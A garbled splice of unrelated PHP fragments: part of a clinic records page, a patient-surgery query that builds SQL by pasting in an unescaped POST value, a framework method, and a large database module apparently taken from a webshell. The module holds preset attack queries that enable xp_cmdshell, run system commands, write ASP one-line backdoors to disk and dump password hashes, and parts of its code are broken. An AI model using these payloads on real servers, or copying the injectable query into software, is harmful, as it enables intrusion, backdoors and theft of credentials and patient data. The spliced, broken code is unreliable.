$press = oci_fetch_row($presult);
$admin_fee = $press[2];
?>
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<h5 class="page-header">ADD NEW RATES:</h5>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<!-- /.row -->
<div class="row">
<div class="col-lg-12">
<div class="panel panel-default">
<div class="panel-heading">
date_default_timezone_set('America/Caracas');
//$operador = unserialize($_SESSION['operador']);
$id = $_POST['id'];
//$id="00152";
$sql = "SELECT \n\t\t\t\t\t\t ID_M_PACIENTES AS HISTORIA,\n\t\t\t\t\t\t NOMBRES AS PACIENTE,\n\t\t\t\t\t\t EDAD,\n\t\t\t\t\t\t SEXO,\n\t\t\t\t\t\t TO_CHAR(FECHA_CIRUGIA,'dd/mm/yyyy') AS FECHAC,\n\t\t\t\t\t\t TO_CHAR(FECHA_CIRUGIA,'HH24:MI:SS') AS HORAC,\n\t\t\t\t\t\t DESCRIPCION AS PROCEDIMIENTO,\n\t\t\t\t\t\t NOMBRE_DIAGNOSTICO,\n\t\t\t\t\t\t OBSERVACIONES\n \t\t\t\t\t FROM V_M_CIRUGIAS \n WHERE ESTATUS='PEN' AND ID_M_PROFESIONALES=(SELECT ID_M_PROFESIONALES \n FROM M_PROFESIONALES\n WHERE ID_M_USUARIOS2='" . $id . "')\n ORDER BY FECHA_CIRUGIA,HORA_CIRUGIA";
$cs = strtoupper($_POST['cli']);
//$cs="CCFA";
$Cn = new conexion($cs);
$conexion = $Cn->conectarse();
$consulta = oci_parse($conexion, $sql);
$ejecutar = oci_execute($consulta);
$numlinea = 0;
$row = '';
$arregloJSON = '';
$i = 0;
while ($row = oci_fetch_row($consulta)) {
$casosquir[$i] = array("hist" => $row[0], "nomb" => $row[1], "edad" => $row[2], "sexo" => $row[3], "fcirug" => $row[4], "hcirug" => $row[5], "descri" => $row[6], "diagno" => $row[7], "obser" => $row[8]);
$arregloJSON = json_encode($casosquir);
$i++;
// echo "Progreso por vuelta ".$jsonarreglo." <br /><br />";
}
// $arregloJSON=json_encode($horarios);
if ($i == 0) {
$casosquir[0] = array("registros" => "norecords");
$arregloJSON = json_encode($casosquir);
echo $arregloJSON;
} else {
echo $arregloJSON;
}
//echo $sql;
?>
/**
* Se Mueve al resultado indicado por $number en un select
*
* @param int $number
* @param resource $resultQuery
* @return boolean
*/
function data_seek($number, $resultQuery = '')
{
if (!$resultQuery) {
$resultQuery = $this->last_result_query;
if (!$resultQuery) {
throw new KumbiaException($this->error('Resource invalido para db::data_seek'));
}
}
if ($this->autocommit) {
$commit = OCI_COMMIT_ON_SUCCESS;
} else {
$commit = OCI_DEFAULT;
}
if (!@oci_execute($resultQuery, $commit)) {
throw new KumbiaException($this->error($php_errormsg . " al ejecutar <em>'{$this->lastQuery}'</em>"));
}
if ($number) {
for ($i = 0; $i <= $number - 1; $i++) {
if (!oci_fetch_row($resultQuery)) {
return false;
}
}
} else {
return true;
}
return true;
}
function otherdb()
{
$db = isset($_GET['db']) ? $_GET['db'] : 'ms';
print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?s=gg&db=ms">   MSSQL  </a>
<a href="?s=gg&db=ora">   Oracle  </a>
<a href="?s=gg&db=ifx">   InforMix  </a>
<a href="?s=gg&db=fb">   FireBird  </a>
<a href="?s=gg&db=db2">  DB2  </a></div></form>
END;
if ($db == "ms") {
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print <<<END
<div class="actall">
<form method="POST" name="msform" action="?s=gg&db=ms">
Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
\tStr[0] = "";
\tStr[1] = "select @@version;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select name from sysobject where type='U';";
\tStr[4] = "select name from syscolumns where id=Object_Id('table_name');";
\tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
\tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
\tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
\tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';";
\tStr[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
\tmsform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
\t<option value="5">sp_oacreate</option>
\t<option value="6">xp_cmdshell</option>
\t<option value="7">xp_cmdshell(2005)</option>
\t<option value="8">sp_oacreate(2005)</option>
\t<option value="9">����openrowset(2005)</option>
\t<option value="10">xp_cmdshell exec</option>
\t<option value="10">sp_oamethod exec</option>
\t<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></form></div>
END;
if ($msaction == 'msquery') {
$msconn = mssql_connect($mshost, $msuser, $mspass);
mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow = mssql_fetch_row($msresult)) {
echo "<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td>' . "{$msrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
mssql_free_result($msresult);
mssql_close();
}
} elseif ($db == "ora") {
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print <<<END
<form method="POST" name="oraform" action="?s=gg&db=ora">
<div class="actall">
Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br>
<script language="javascript">
function oraFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select version();";
\tStr[2] = "SELECT NAME FROM V{$DATABASE}";
\tStr[3] = "select * From all_objects where object_type='TABLE'";
\tStr[4] = "select column_name from user_tab_columns where table_name='table1'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">��ʾ�汾</option>
\t<option value="2">���ݿ�</option>
\t<option value="3">����</option>
\t<option value="4">�ֶ�</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($oraaction == 'oraquery') {
$oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
$oraresult = ociparse($oralink, $oraquery) or die(ocierror());
$orarow = oci_fetch_row($oraresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ociresult($oraresult, 0);
while ($orarow = ora_fetch_row($oraresult)) {
echo "<tr>\n";
for ($i = 0; $i < ora_num_fields($result); $i++) {
echo '<td>' . "{$orarow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
oci_free_statement($oraresult);
ocilogoff();
}
} elseif ($db == "ifx") {
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print <<<END
<form method="POST" name="ifxform" action="?s=gg&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br>
<script language="javascript">
function ifxFull(i){
Str = new Array(11);
\tStr[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
\tStr[2] = "select name from sysdatabases;";
\tStr[3] = "select tabname from systables;";
\tStr[4] = "select colname from syscolumns where tabid=n;";
\tStr[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�����������</option>
\t<option value="1">���ݿ�</option>
\t<option value="2">����</option>
\t<option value="3">�ֶ�</option>
\t<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($ifxaction == 'ifxquery') {
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
$ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
$ifxrow = ifx_fetch_row($ifxresult);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n";
}
echo "</tr>\n";
mysql_data_seek($ifxresult, 0);
while ($ifxrow = ifx_fetch_row($ifxresult)) {
echo "<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td>' . "{$ifxrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ifx_free_result($ifxresult);
ifx_close();
}
} elseif ($db == "db2") {
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print <<<END
<form method="POST" name="db2form" action="?s=gg&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br>
<script language="javascript">
function db2Full(i){
Str = new Array(4);
\tStr[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
\tStr[2] = "select name from sysibm.systables;";
\tStr[3] = "select colname from syscat.columns where tabname='table_name';";
\tStr[4] = "db2 get db cfg for db_name;";
db2form.db2sql.value = Str[i];
return true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">���ݿ�</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">���ݿ�����</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query') {
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
$db2row = db2_fetch_row($db2result);
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n";
}
echo "</tr>\n";
while ($db2row = db2_fetch_row($db2result)) {
echo "<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td>' . "{$db2row[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
db2_free_result($db2result);
db2_close();
}
} elseif ($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print <<<END
<form method="POST" name="fbform" action="?s=gg&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
Str = new Array(5);
\tStr[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
\tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
\tStr[3] = "input 'D:\\createtable.sql';";
\tStr[4] = "shell netstat -an;";
fbform.fbsql.value = Str[i];
return true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>ִ������</option>
\t<option value="1">����</option>
\t<option value="2">�ֶ�</option>
\t<option value="3">����sql</option>
\t<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($fbaction == 'fbquery') {
$fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
$fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n";
}
echo "</tr>\n";
ibase_field_info($fbresult, 0);
while ($fbrow = ibase_fetch_row($fbresult)) {
echo "<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td>' . "{$fbrow[$i]}" . '</td>';
}
echo "</tr>\n";
}
echo "</table></font>";
ibase_free_result($fbresult);
ibase_close();
}
}
}